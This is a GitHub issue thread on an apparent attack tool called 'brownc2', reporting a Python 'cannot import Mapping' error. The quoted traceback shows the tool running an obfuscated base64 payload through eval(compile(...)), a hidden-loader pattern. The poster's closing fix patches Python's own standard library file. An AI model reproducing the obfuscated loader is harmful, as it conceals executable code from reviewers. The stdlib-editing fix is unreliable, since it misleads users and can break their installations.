### ISSUE TITLE
Cannot Import Mapping

### ISSUE THREAD

**Issue by d4rks0ul555** [rude1882/brownc2#1]
Traceback (most recent call last):
  File "/home/kali/AlatSantet/PukulWeb/brownc2/brown.py", line 11, in <module>
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
  File "<string>", line 3, in <module>
  File "/usr/local/lib/python3.10/dist-packages/requests/__init__.py", line 43, in <module>
    import urllib3
  File "/usr/local/lib/python3.10/dist-packages/urllib3/__init__.py", line 8, in <module>
    from .connectionpool import (
  File "/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py", line 29, in <module>
    from .connection import (
  File "/usr/local/lib/python3.10/dist-packages/urllib3/connection.py", line 39, in <module>
    from .util.ssl_ import (
  File "/usr/local/lib/python3.10/dist-packages/urllib3/util/__init__.py", line 3, in <module>
    from .connection import is_connection_dropped
  File "/usr/local/lib/python3.10/dist-packages/urllib3/util/connection.py", line 3, in <module>
    from .wait import wait_for_read
  File "/usr/local/lib/python3.10/dist-packages/urllib3/util/wait.py", line 1, in <module>
    from .selectors import (
  File "/usr/local/lib/python3.10/dist-packages/urllib3/util/selectors.py", line 14, in <module>
    from collections import namedtuple, Mapping
ImportError: cannot import name 'Mapping' from 'collections' (/usr/lib/python3.10/collections/__init__.py)

**Comment by d4rks0ul555** [comment]
i'm using Kali Linux , please help

**Comment by d4rks0ul555** [comment]
solved!!! 

open /usr/lib/python3.10/collections/init.py

add into script -->


from collections.abc import Mapping, MutableMapping,  Sequence


and all done
